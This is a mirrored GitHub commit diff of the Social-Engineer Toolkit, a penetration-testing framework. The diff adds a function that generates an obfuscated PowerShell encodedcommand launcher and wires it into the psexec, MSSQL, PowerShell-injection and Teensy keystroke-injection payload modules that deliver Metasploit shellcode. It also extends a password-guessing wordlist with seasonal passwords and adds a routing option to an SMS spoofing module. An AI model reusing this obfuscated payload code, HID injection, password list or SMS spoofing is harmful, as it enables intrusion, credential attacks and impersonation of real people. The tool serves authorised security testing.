Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2024-11-26 06:20:19 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #1 from trustedsec/master

Browse source 
Update of recent changes
This commit is contained in:
mikecjudge 2017-02-23 00:11:24 +13:00 committed by GitHub
commit f165bcb6ac
36 changed files with 293 additions and 267 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

26
readme/CHANGELOG
View file

@ -1,3 +1,29 @@
~~~~~~~~~~~~~~~~
version 7.5.1
~~~~~~~~~~~~~~~~
* moved config file to be the first identifier for metasploit config file then move onto other methods. Possible for conflicts to override
~~~~~~~~~~~~~~~~
version 7.5
~~~~~~~~~~~~~~~~
* updated config to turn apache_server default from on to off. can switch this under /etc/setoolkit/set.config to on if you want apache.
* wrote centralized function for new powershell encodedcommand obfsucation
* added encodedcommand to java applet
* added encodedcommand to hta attack vector
* added encodedcommand to teensy
* added encodedcommand to all modules with powershell injection
* remove sms modules templates that were no longer used
* added routes to help with spoofing - default is auto
~~~~~~~~~~~~~~~~
version 7.4.5
~~~~~~~~~~~~~~~~
* update fasttrack wordlist (git suggestion)
* updated teensy codebase thanks to mikecjudge
~~~~~~~~~~~~~~~~
version 7.4.4
~~~~~~~~~~~~~~~~

2
setoolkit
View file

@ -41,7 +41,7 @@ if not os.path.isfile("/etc/setoolkit/set.config"):
with open("/etc/setoolkit/set.config") as fileopen:
data = fileopen.read()
if "CONFIG_VERSION=7.3.9" not in data:
if "CONFIG_VERSION=7.5" not in data:
print("[*] Overwriting old config for updates to SET. Backing up your old one in /etc/setoolkit/")
shutil.move("/etc/setoolkit/set.config", "/etc/setoolkit/set.config.bak")
shutil.copyfile("src/core/config.baseline", "/etc/setoolkit/set.config")

4
src/core/config.baseline
View file

@ -24,7 +24,7 @@
## ##
## There are additional options; read the comments for additional descriptions. ##
## ##
## CONFIG_VERSION=7.3.9 ##
## CONFIG_VERSION=7.5 ##
## ##
##################################################################################################
##################################################################################################
@ -92,7 +92,7 @@ TIME_DELAY_EMAIL=1
#
### Use Apache instead of the standard Python web server. This will increase the speed
### of the attack vector.
APACHE_SERVER=ON
APACHE_SERVER=OFF
#
### Path to the Apache web root.
APACHE_DIRECTORY=/var/www

5
src/core/set.py
View file

@ -1198,6 +1198,11 @@ and send the QRCode via a mailer.
# sms spoofing module option 10
if main_menu_choice == '10':
### TEMPORARILY DISABLED
#print_error("This module is currently disabled as spoofmytextmessage.com is currently experiencing issues. As soon as it is working again or I can rework the module, this will remain disabled.")
#raw_input("Press {return} to connect to the main menu.")
try:
module_reload(src.sms.sms)
except:

2
src/core/set.version
View file

@ -1 +1 @@
7.4.4
7.5.1

236
src/core/setcore.py
View file

@ -1,4 +1,4 @@
1#!/usr/bin/env python
1 # !/usr/bin/env python
#
# Centralized core modules for SET
#
@ -19,7 +19,7 @@ from src.core import dictionaries
import io
import trace
#python 2 and 3 compatibility
# python 2 and 3 compatibility
try:
from urllib.request import urlopen
except ImportError:
@ -53,6 +53,8 @@ except ImportError:
pass
# get the main SET path
def definepath():
if check_os() == "posix":
if os.path.isfile("setoolkit"):
@ -64,6 +66,8 @@ def definepath():
return os.getcwd()
# check operating system
def check_os():
if os.name == "nt":
operating_system = "windows"
@ -158,6 +162,8 @@ else:
self.DARKCYAN = ''
# this will be the home for the set menus
def setprompt(category, text):
# if no special prompt and no text, return plain prompt
if category == '0' and text == "":
@ -190,6 +196,7 @@ def setprompt(category, text):
promptstring = promptstring + "> " + text + ":"
return promptstring
def yesno_prompt(category, text):
valid_response = False
while not valid_response:
@ -205,6 +212,7 @@ def yesno_prompt(category, text):
print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
return response
def return_continue():
print(("\n Press " + bcolors.RED +
"<return> " + bcolors.ENDC + "to continue"))
@ -222,6 +230,8 @@ DEBUG_LEVEL = 0
# 6 = imports, info messages, menus with pause for <ENTER>
debugFrameString = '-' * 72
def debug_msg(currentModule, message, msgType):
if DEBUG_LEVEL == 0:
pass # stop evaluation efficiently
@ -242,27 +252,35 @@ def mod_name():
#
# RUNTIME MESSAGES ############
def print_status(message):
print(bcolors.GREEN + bcolors.BOLD + "[*] " + bcolors.ENDC + str(message))
def print_info(message):
print(bcolors.BLUE + bcolors.BOLD + "[-] " + bcolors.ENDC + str(message))
def print_info_spaces(message):
print(bcolors.BLUE + bcolors.BOLD + " [-] " + bcolors.ENDC + str(message))
def print_warning(message):
print(bcolors.YELLOW + bcolors.BOLD + "[!] " + bcolors.ENDC + str(message))
def print_error(message):
print(bcolors.RED + bcolors.BOLD +
"[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC)
def get_version():
define_version = open("src/core/set.version", "r").read().rstrip()
#define_version = '7.2.3'
# define_version = '7.2.3'
return define_version
class create_menu:
def __init__(self, text, menu):
@ -284,6 +302,7 @@ class create_menu:
print('\n 99) Return to Main Menu\n')
return
def validate_ip(address):
try:
if socket.inet_aton(address):
@ -303,80 +322,84 @@ def validate_ip(address):
#
# grab the metaspoit path
#
def meta_path():
# DEFINE METASPLOIT PATH
trigger = 0
try:
# specific for backbox linux
if os.path.isfile("/opt/metasploit-framework/msfconsole"):
msf_path = "/opt/metasploit-framework/"
# pull from config first
msf_path = check_config("METASPLOIT_PATH=")
if not msf_path.endswith("/"):
msf_path = msf_path + "/"
if os.path.isfile(msf_path + "msfconsole"):
trigger = 1
# if we are using just the standard path for msfconsole
if os.path.isfile("/usr/bin/msfconsole"):
if trigger == 0:
msf_path = "/usr/bin/"
trigger = 1
# specific for backbox linux
if os.path.isfile("/opt/metasploit-framework/msfconsole"):
if trigger == 0:
msf_path = "/opt/metasploit-framework/"
trigger = 1
# specific for kali linux
if os.path.isfile("/opt/metasploit/apps/pro/msf3/msfconsole"):
# left blank since you can call launcher and ruby1.9 - 2x issues
# are there
msf_path = ""
trigger = 1
if trigger == 0:
msf_path = ""
trigger = 1
# specific for backtrack5 and other backtrack versions
if os.path.isfile("/opt/framework3/msf3/msfconsole"):
msf_path = "/opt/framework3/msf3/"
trigger = 1
if trigger == 0:
msf_path = "/opt/framework3/msf3/"
trigger = 1
if os.path.isfile("/opt/framework/msf3/msfconsole"):
msf_path = "/opt/framework/msf3/"
trigger = 1
if trigger == 0:
msf_path = "/opt/framework/msf3/"
trigger = 1
if os.path.isfile("/opt/metasploit/msf3/msfconsole"):
msf_path = "/opt/metasploit/msf3/"
trigger = 1
if trigger == 0:
msf_path = "/opt/metasploit/msf3/"
trigger = 1
# specific for pwnpad and pwnplug (pwnie express)
if os.path.isfile("/opt/metasploit-framework/msfconsole"):
msf_path = "/opt/metasploit-framework/"
trigger = 1
if trigger == 0:
msf_path = "/opt/metasploit-framework/"
trigger = 1
# specific for pentesters framework github.com/trustedsec/ptf
if os.path.isfile("/pentest/exploitation/metasploit/msfconsole"):
msf_path = "/pentest/exploitation/metasploit/"
trigger = 1
# if we are using just the standard path for msfconsole
if os.path.isfile("/usr/bin/msfconsole"):
msf_path = "/usr/bin/"
trigger = 1
if trigger == 0:
msf_path = "/pentest/exploitation/metasploit/"
trigger = 1
# Kali linux bleeding edge should return this in order to work
if os.path.isfile("/usr/share/metasploit-framework/msfconsole"):
msf_path = "/usr/share/metasploit-framework/"
trigger = 1
if trigger == 0:
msf_path = "/usr/share/metasploit-framework/"
trigger = 1
# if we are using windows
if check_os() == "windows":
print_warning(
"Metasploit payloads are not currently supported. This is coming soon.")
msf_path = False
except Exception as e:
print_status("Something went wrong. Printing error: " + str(e))
# if all else fails then pull config path
if trigger == 0:
msf_path = check_config("METASPLOIT_PATH=")
if msf_path.endswith("/"):
pass
else:
msf_path = msf_path + "/"
if not os.path.isfile(msf_path + "/msfconsole"):
# if we didn't find anything
if trigger == 0:
print_error(
"Metasploit path not found. These payloads will be disabled.")
print_error(
"Please configure Metasploit's path in the /etc/setoolkit/set.config file.")
msf_path = False
except Exception as e:
print_status("Something went wrong. Printing error: " + str(e))
# this is an option if we don't want to use Metasploit period
check_metasploit = check_config("METASPLOIT_MODE=").lower()
if check_metasploit != "on":
@ -386,6 +409,8 @@ def meta_path():
#
# grab the metaspoit path
#
def meta_database():
# DEFINE METASPLOIT PATH
meta_path = open("/etc/setoolkit/set.config", "r").readlines()
@ -477,6 +502,8 @@ def cleanup_routine():
#
# Update The Social-Engineer Toolkit
#
def update_set():
backbox = check_backbox()
kali = check_kali()
@ -506,6 +533,8 @@ def update_set():
#
# Pull the help menu here
#
def help_menu():
fileopen = open("README.md", "r").readlines()
for line in fileopen:
@ -529,6 +558,8 @@ def date_time():
#
# generate a random string
#
def generate_random_string(low, high):
length = random.randint(low, high)
letters = string.ascii_letters + string.digits
@ -538,6 +569,8 @@ def generate_random_string(low, high):
# clone JUST a website, and export it.
# Will do no additional attacks.
#
def site_cloner(website, exportpath, *args):
grab_ipaddress()
ipaddr = grab_ipaddress()
@ -602,6 +635,8 @@ def start_web_server(directory):
#
# this will start a web server without threads
#
def start_web_server_unthreaded(directory):
try:
# import the threading, socketserver, and simplehttpserver
@ -669,6 +704,8 @@ def java_applet_attack(website, port, directory):
# this will create a raw PDE file for you to use in your teensy device
#
#
def teensy_pde_generator(attack_method):
# grab the ipaddress
@ -734,12 +771,16 @@ def teensy_pde_generator(attack_method):
#
# Expand the filesystem windows directory
#
def windows_root():
return os.environ['WINDIR']
#
# core log file routine for SET
#
def log(error):
try:
# open log file only if directory is present (may be out of directory
@ -763,6 +804,8 @@ def log(error):
#
# upx encoding and modify binary
#
def upx(path_to_file):
# open the set_config
fileopen = open("/etc/setoolkit/set.config", "r")
@ -806,6 +849,7 @@ def upx(path_to_file):
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
time.sleep(3)
def show_banner(define_version, graphic):
if graphic == "1":
@ -821,7 +865,7 @@ def show_banner(define_version, graphic):
[---] The Social-Engineer Toolkit (""" + bcolors.YELLOW + """SET""" + bcolors.BLUE + """) [---]
[---] Created by:""" + bcolors.RED + """ David Kennedy """ + bcolors.BLUE + """(""" + bcolors.YELLOW + """ReL1K""" + bcolors.BLUE + """) [---]
Version: """ + bcolors.RED + """%s""" % (define_version) + bcolors.BLUE + """
Codename: '""" + bcolors.YELLOW + """Recharged""" + bcolors.ENDC + bcolors.BLUE + """'
Codename: '""" + bcolors.YELLOW + """Ghost""" + bcolors.ENDC + bcolors.BLUE + """'
[---] Follow us on Twitter: """ + bcolors.PURPLE + """@TrustedSec""" + bcolors.BLUE + """ [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE + """@HackingDave""" + bcolors.BLUE + """ [---]
[---] Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE + """ [---]
@ -833,7 +877,8 @@ def show_banner(define_version, graphic):
""" Join us on irc.freenode.net in channel #setoolkit\n""" + bcolors.ENDC)
print(bcolors.BOLD + """ The Social-Engineer Toolkit is a product of TrustedSec.\n\n Visit: """ +
bcolors.GREEN + """https://www.trustedsec.com\n""" + bcolors.ENDC)
print(bcolors.BLUE + """ It's easy to update using the PenTesters Framework! (PTF)\nVisit """ + bcolors.YELLOW + """https://github.com/trustedsec/ptf""" + bcolors.BLUE + """ to update all your tools!\n\n""" + bcolors.ENDC)
print(bcolors.BLUE + """ It's easy to update using the PenTesters Framework! (PTF)\nVisit """ + bcolors.YELLOW +
"""https://github.com/trustedsec/ptf""" + bcolors.BLUE + """ to update all your tools!\n\n""" + bcolors.ENDC)
# here we check if there is a new version of SET - if there is, then
# display a banner
@ -842,25 +887,32 @@ def show_banner(define_version, graphic):
# pull version
try:
version = ""
def pull_version():
if not os.path.isfile(setdir + "/version.lock"):
try:
url = ('https://raw.githubusercontent.com/trustedsec/social-engineer-toolkit/master/src/core/set.version')
url = (
'https://raw.githubusercontent.com/trustedsec/social-engineer-toolkit/master/src/core/set.version')
version = urlopen(url).read().rstrip().decode('utf-8')
filewrite = open(setdir + "/version.lock", "w")
filewrite.write(version)
filewrite.close()
except KeyboardInterrupt: version = "keyboard interrupt"
except KeyboardInterrupt:
version = "keyboard interrupt"
else: version = open(setdir + "/version.lock", "r").read()
else:
version = open(setdir + "/version.lock", "r").read()
if cv != version:
if version != "":
print(bcolors.RED + " There is a new version of SET available.\n " + bcolors.GREEN + " Your version: " + bcolors.RED + cv + bcolors.GREEN + "\n Current version: " + bcolors.ENDC + bcolors.BOLD + version + bcolors.YELLOW + "\n\nPlease update SET to the latest before submitting any git issues.\n\n" + bcolors.ENDC)
print(bcolors.RED + " There is a new version of SET available.\n " + bcolors.GREEN + " Your version: " + bcolors.RED + cv + bcolors.GREEN +
"\n Current version: " + bcolors.ENDC + bcolors.BOLD + version + bcolors.YELLOW + "\n\nPlease update SET to the latest before submitting any git issues.\n\n" + bcolors.ENDC)
# why urllib and sockets cant control DNS resolvers is beyond me - so we use this as a hack job to add a delay and kill if updates are taking too long
# why urllib and sockets cant control DNS resolvers is beyond me - so
# we use this as a hack job to add a delay and kill if updates are
# taking too long
p = multiprocessing.Process(target=pull_version)
p.start()
@ -869,14 +921,16 @@ def show_banner(define_version, graphic):
# If thread is still active
if p.is_alive():
print(bcolors.RED + " Unable to check for new version of SET (is your network up?)\n" + bcolors.ENDC)
print(
bcolors.RED + " Unable to check for new version of SET (is your network up?)\n" + bcolors.ENDC)
# terminate the process
p.terminate()
p.join()
except Exception as err:
print(err)
#pass
# pass
def show_graphic():
menu = random.randrange(2, 15)
@ -1088,7 +1142,6 @@ def show_graphic():
``:::::::::::::::::::''
``:::::::::''""" + bcolors.ENDC)
if menu == 14:
print(bcolors.BOLD + """
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
@ -1174,10 +1227,14 @@ def set_check():
return False
# if the user specifies 99
def menu_back():
print_info("Returning to the previous menu...")
# used to generate random templates for the phishing schema
def custom_template():
try:
print (" [****] Custom Template Generator [****]\n")
@ -1233,10 +1290,14 @@ def check_length(choice, max):
counter = 1
# valid if IP address is legit
def is_valid_ip(ip):
return is_valid_ipv4(ip) or is_valid_ipv6(ip)
# ipv4
def is_valid_ipv4(ip):
pattern = re.compile(r"""
^
@ -1275,6 +1336,8 @@ def is_valid_ipv4(ip):
return pattern.match(ip) is not None
# ipv6
def is_valid_ipv6(ip):
"""Validates IPv6 addresses.
"""
@ -1338,6 +1401,8 @@ def check_config(param):
return line[1]
# copy an entire folder function
def copyfolder(sourcePath, destPath):
for root, dirs, files in os.walk(sourcePath):
@ -1382,6 +1447,8 @@ def check_options(option):
return trigger
# future home to update one localized set configuration file
def update_options(option):
# if the file isn't there write a blank file
if not os.path.isfile(setdir + "/set.options"):
@ -1403,6 +1470,8 @@ def update_options(option):
filewrite.close()
# python socket listener
def socket_listener(port):
port = int(port) # needed integer for port
host = '' # Symbolic name meaning the local host
@ -1429,6 +1498,8 @@ def socket_listener(port):
conn.close()
# generates powershell payload
def generate_powershell_alphanumeric_payload(payload, ipaddr, port, payload2):
# generate our shellcode first
shellcode = metasploit_shellcode(payload, ipaddr, port)
@ -1436,7 +1507,7 @@ def generate_powershell_alphanumeric_payload(payload, ipaddr, port, payload2):
# if not "reverse_http" in payload or not "reverse_https" in payload:
if not "http" in payload:
shellcode = shellcode_replace(ipaddr, port, shellcode).rstrip()
shellcode = shellcode_replace(ipaddr, port, shellcode).rstrip()
# sub in \x for 0x
shellcode = re.sub("\\\\x", "0x", shellcode)
shellcode = shellcode.replace("\\", "")
@ -1485,6 +1556,8 @@ def generate_powershell_alphanumeric_payload(payload, ipaddr, port, payload2):
return base64.b64encode(powershell_command.encode('utf_16_le')).decode("ascii")
# generate base shellcode
def generate_shellcode(payload, ipaddr, port):
msf_path = meta_path()
@ -1502,6 +1575,8 @@ def generate_shellcode(payload, ipaddr, port):
return data
# this will take input for shellcode and do a replace for IP addresses
def shellcode_replace(ipaddr, port, shellcode):
# split up the ip address
ip = ipaddr.split('.')
@ -1565,6 +1640,8 @@ def shellcode_replace(ipaddr, port, shellcode):
return shellcode
# exit routine
def exit_set():
cleanup_routine()
print("\n\n Thank you for " + bcolors.RED + "shopping" + bcolors.ENDC +
@ -1610,6 +1687,8 @@ def metasploit_shellcode(payload, ipaddr, port):
# here we encrypt via aes, will return encrypted string based on secret
# key which is random
def encryptAES(secret, data):
# the character used for padding--with a block cipher such as AES, the value
@ -1636,6 +1715,8 @@ def encryptAES(secret, data):
return str(aes)
# compare ports to make sure its not already in a config file for metasploit
def check_ports(filename, port):
fileopen = open(filename, "r")
data = fileopen.read()
@ -1680,6 +1761,8 @@ class DNSQuery:
return packet
# main dns routine
def dns():
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udps.bind(('', 53))
@ -1695,6 +1778,8 @@ def dns():
udps.close()
# start dns
def start_dns():
thread.start_new_thread(dns, ())
@ -1717,6 +1802,8 @@ setdir = setdir()
# convert an IP address from its dotted-quad format to its
# 32 binary digit representation
def ip2bin(ip):
b = ""
inQuads = ip.split(".")
@ -1732,6 +1819,8 @@ def ip2bin(ip):
# convert a decimal number to binary representation
# if d is specified, left-pad the binary number with 0s to that length
def dec2bin(n, d=None):
s = ""
while n > 0:
@ -1748,6 +1837,8 @@ def dec2bin(n, d=None):
return s
# convert a binary string into an IP address
def bin2ip(b):
ip = ""
for i in range(0, len(b), 8):
@ -1755,6 +1846,8 @@ def bin2ip(b):
return ip[:-1]
# print a list of IP addresses based on the CIDR block specified
def printCIDR(c):
parts = c.split("/")
baseIP = ip2bin(parts[0])
@ -1777,6 +1870,8 @@ def printCIDR(c):
return breakdown
# input validation routine for the CIDR block specified
def validateCIDRBlock(b):
# appropriate format for CIDR block ($prefix/$subnet)
p = re.compile("^([0-9]{1,3}\.){0,3}[0-9]{1,3}(/[0-9]{1,2}){1}$")
@ -1799,6 +1894,8 @@ def validateCIDRBlock(b):
# Queries a remote host on UDP:1434 and returns MSSQL running port
# Written by Larry Spohn (spoonman) @ TrustedSec
def get_sql_port(host):
# Build the socket with a .1 second timeout
@ -1815,7 +1912,8 @@ def get_sql_port(host):
d = s.recvfrom(1024)
sql_port = d[0].split(";")[9]
# if we have an exception, udp 1434 isnt there could be firewalled off so we need to check 1433 just in case
# if we have an exception, udp 1434 isnt there could be firewalled off
# so we need to check 1433 just in case
except:
sql_port = "1433"
pass
@ -1829,13 +1927,16 @@ def get_sql_port(host):
return host + ":" + sql_port
# if port is closed
except: return None
except:
return None
except Exception as err:
print(err)
pass
# capture output from a function
def capture(func, *args, **kwargs):
"""Capture the output of func when called with the given arguments.
@ -1855,6 +1956,8 @@ def capture(func, *args, **kwargs):
return (result, c1.getvalue(), c2.getvalue())
# check to see if we are running backbox linux
def check_backbox():
if os.path.isfile("/etc/issue"):
backbox = open("/etc/issue", "r")
@ -1869,6 +1972,8 @@ def check_backbox():
return "Non-BackBox"
# check to see if we are running kali linux
def check_kali():
if os.path.isfile("/etc/apt/sources.list"):
kali = open("/etc/apt/sources.list", "r")
@ -1883,6 +1988,8 @@ def check_kali():
return "Non-Kali"
# here we give multiple options to specify for SET java applet
def applet_choice():
# prompt here
@ -1925,6 +2032,8 @@ Select which option you want:
module_reload(src.html.unsigned.verified_sign)
# reload module function for python 2 and python 3
def module_reload(module):
if sys.version_info >= (3, 0):
import importlib
@ -1933,10 +2042,14 @@ def module_reload(module):
reload(module)
# used to replace any input that we have from python 2 to python 3
def input(string):
return raw_input(string)
# fetch URL needed for web cloning
def fetch_template():
fileopen = open(setdir + "/site.template").readlines()
for line in fileopen:
@ -1966,3 +2079,12 @@ def tail(filename):
else:
print_error("File not found, cannot tail.")
# this will create an obfsucated powershell encoded command string to be
# used through SET
def powershell_encodedcommand():
ran1 = generate_random_string(1, 2)
ran2 = generate_random_string(1, 2)
ran3 = generate_random_string(1, 2)
ran4 = generate_random_string(1, 2)
return 'powershell -w 1 -C "sv %s -;sv %s ec;sv %s ((gv %s).value.toString()+(gv %s).value.toString());powershell (gv %s).value.toString() "' % (ran1, ran2, ran3, ran1, ran2, ran3)

2
src/fasttrack/mssql.py
View file

@ -262,7 +262,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
x86 = file(core.setdir + "x86.powershell").read().rstrip()
# x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
x86 = core.powershell_encodedcommand() + x86
core.print_status("If you want the powershell commands and attack, "
"they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")

4
src/fasttrack/psexec.py
View file

@ -83,10 +83,8 @@ try:
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
os.makedirs(os.path.join(core.setdir + "reports/powershell"))
#with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
# x86 = fileopen.read()
x86 = open(core.setdir + "x86.powershell", "r").read()
x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
x86 = core.powershell_encodedcommand() + x86
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
filewrite = file(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)

40
src/fasttrack/wordlist.txt
View file

@ -1,3 +1,43 @@
Spring2017
Spring2016
Spring2015
Spring2014
Spring2013
spring2017
spring2016
spring2015
spring2014
spring2013
Summer2017
Summer2016
Summer2015
Summer2014
Summer2013
summer2017
summer2016
summer2015
summer2014
summer2013
Autumn2017
Autumn2016
Autumn2015
Autumn2014
Autumn2013
autumn2017
autumn2016
autumn2015
autumn2014
autumn2013
Winter2017
Winter2016
Winter2015
Winter2014
Winter2013
winter2017
winter2016
winter2015
winter2014
winter2013
P@55w0rd
P@ssw0rd!
P@55w0rd!

2
src/powershell/powershell.py
View file

@ -57,7 +57,7 @@ if powershell_menu_choice != "99":
# here we format everything for us
with open(core.setdir + "/x86.powershell") as fileopen:
x86 = fileopen.read()
x86 = "powershell -nop -window hidden -noni -e " + x86
x86 = core.powershell_encodedcommand() + x86
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell/")))
with open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") as filewrite:
filewrite.write(x86)

42
src/sms/sms.py
View file

@ -1,6 +1,7 @@
#!/usr/bin/env python
# coding=utf-8
import src.core.setcore as core
#import src.core.setcore as core
from src.core.setcore import *
import sys
import getpass
@ -15,7 +16,7 @@ try:
import requests
except ImportError:
core.print_error("Looks like you dont have python-requests installed. "
print_error("Looks like you dont have python-requests installed. "
"Please install (apt-get install python-requests) and try again.")
input("Press {return} to continue.")
trigger = 1
@ -35,7 +36,7 @@ def _do_sms():
print("Special thanks to Khalil @sehnaoui for testing out the service for me and finding "
"spoofmytextmessage.com\n")
core.print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and "
print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and "
"services from spoofmytextmessage.com and you are fully aware of your countries "
"legal stance on SMS spoofing prior to performing any of these. By accepting yes "
"you fully acknowledge these terms and will not use them for unlawful purposes.")
@ -43,31 +44,40 @@ def _do_sms():
message = input("\nDo you accept these terms (yes or no): ")
if message == "yes":
core.print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
email = input(core.setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
core.print_status("Note that the password below will be masked and you will not see the output.")
pw = getpass.getpass(core.setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
core.print_status("The next section requires a country code, this is the code you would use to dial "
print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
print_status("Please note that spoofing may not work with all carriers. If it doesn't work, SET cannot be changed or modified in order to make it work. Would recommend trying different routes to get it working, if that doesn't work, you will need to contact spoofmytextmessages.com")
email = input(setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
print_status("Note that the password below will be masked and you will not see the output.")
pw = getpass.getpass(setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
print_status("The next section requires a country code, this is the code you would use to dial "
"to the specific country, for example if I was sending a message to 555-555-5555 to "
"the United States (or from) you would enter +1 below.")
tocountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending TO "
tocountry = input(setprompt(["7"], "Enter the country code for the number you are sending TO "
"(for example U.S would be '+1')[+1]"))
if tocountry == "":
tocountry = "+1"
fromcountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending FROM "
fromcountry = input(setprompt(["7"], "Enter the country code for the number you are sending FROM "
"(for example U.S. would be '+1')[+1]"))
if fromcountry == "":
fromcountry = "+1"
tonumber = input(core.setprompt(["7"], "Enter the number to send the SMS TO - be sure to include "
tonumber = input(setprompt(["7"], "Enter the number to send the SMS TO - be sure to include "
"country code (example: +15551234567)"))
fromnumber = input(core.setprompt(["7"], "Enter the number you want to come FROM - be sure to include "
fromnumber = input(setprompt(["7"], "Enter the number you want to come FROM - be sure to include "
"country code (example: +15551234567)"))
message = input(core.setprompt(["7"], "Enter the message you want to send via the text message"))
message = input(setprompt(["7"], "Enter the message you want to send via the text message"))
print_status("Routes provide different methods for different carriers. Usually auto is the best option, but you may want to try 1 or 2. The options are [a] (auto), 1, or 2.")
route = input(setprompt(["7"], "Enter the route (test different routes) (options a, 1, or 2)[a]"))
if route == "": route = ("auto")
if route == "a": route = ("auto")
# note that the function for this is in a compiled python file with no source -
# this was done at the request of the third party we use since the API is not documented.
@ -75,11 +85,11 @@ def _do_sms():
# and json and uses that to interact with the API. From a security standpoint if you are
# uncomfortable using this - feel free to ping me and I can walk you through what I do
# without giving away the API from the third party.
from src.sms.protectedapi import send_sms
send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message)
from src.sms.spoofapi import send_sms
send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message, route)
else:
core.print_status("Okay! Exiting out of the Social-Engineer Toolkit SMS Spoofing Attack Vector...")
print_status("Okay! Exiting out of the Social-Engineer Toolkit SMS Spoofing Attack Vector...")
# launch sms
try:

6
src/sms/spoofapi.py
View file

@ -8,7 +8,7 @@ import json
import requests
from src.core.setcore import *
def send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message):
def send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message, route):
try: input = raw_input
except: pass
@ -38,7 +38,7 @@ def send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message):
url = 'https://api.spoofmytextmessage.com/2.0/index.php?task=send'
payload = {'non': 'number', 'fromnumber': fromnumber, 'to': tonumber, 'tocountry': tocountry, 'fromcountry': fromcountry,
'text': message, 'code': code, 'task': 'send', 'terms': '1', 'secureid': secureid, 'mid': id, 'email': email,
'source': 'settoolkit', 'osname': 'settoolkit', 'app': 'settoolkit', 'selves': '1'}
'source': 'settoolkit', 'osname': 'settoolkit', 'app': 'settoolkit', 'selves': '1', 'route' : route}
r = requests.post(url, data=payload)
@ -49,7 +49,7 @@ def send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message):
else:
print_error("We were unable to successfully send the text message. Check all your settings and try again.")
print("Printing error from spoofmytextmessage.com: " + r.content)
print_error("Printing error from spoofmytextmessage.com: " + r.content)
input("Press {return} to return to the previous menu.")
except IndexError as error:

4
src/teensy/powershell_shellcode.py
View file

@ -78,7 +78,7 @@ void loop()
delay(5000);
CommandAtRunBar("cmd");
delay(750);
Keyboard.print("powershell -nop -window hidden -noni -EncodedCommand ");
Keyboard.print("%s");
// Write the binary to the notepad file
int i;
for (i = 0; i < sizeof(exploit)/sizeof(int); i++) {
@ -149,7 +149,7 @@ Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
""")
""" % (core.powershell_encodedcommand())
print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir + "reports/teensy.ino")))
if not os.path.isdir(os.path.join(core.setdir + "reports")):
os.makedirs(os.path.join(core.setdir + "reports"))

8
src/teensy/sd2teensy.py
View file

@ -6,10 +6,6 @@ import subprocess
import src.core.setcore as core
# from src.core.setcore import *
# from src.core.dictionaries import *
# from src.core.menu.text import *
##########################################################################
#
# BSIDES LV SDCARD to Teensy Creator
@ -174,7 +170,7 @@ void setup()
// run through cmd
CommandAtRunBar("cmd");
delay(1000);
Keyboard.println("powershell -e {powershell_command}");
Keyboard.println("{encodedcommand} {powershell_command}");
// Tweak this delay. Larger files take longer to decode through powershell.
delay(10000);
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}");
@ -232,7 +228,7 @@ Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}}
""".format(random_filename=random_filename, powershell_command=powershell_command, vbs=vbs, bat=bat))
""".format(random_filename=random_filename, encodedcommand=core.powershell_encodedcommand() ,powershell_command=powershell_command, vbs=vbs, bat=bat))
# delete temporary file
subprocess.Popen("rm {0} 1> /dev/null 2>/dev/null".format(random_filename), shell=True).wait()
print("[*] Binary to Teensy file exported as teensy.ino")

9
src/templates/sms/12161896267335046246.template
View file

@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="221251"
SUBJECT="Movistar: publicidad nieve"
BODY="MS Publi:Entra en www.apuntatealanieve.es y participa en el sorteo de 50 packs de 2 forfaits para 2 dias en cualquier estacion de Aramon. Valido hasta el 2/03"

9
src/templates/sms/16596172621284277248.template
View file

@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="609"
SUBJECT="Movistar: publicidad verano internet"
BODY="Movistar publi: Este verano sigue en Internet con el Kit INTERNET MOVIL PREPAGO.Si lo usas pagas,si no lo usas no pagas.Consiguelo en tu distribuidor movistar"

9
src/templates/sms/18563883160952176830.template
View file

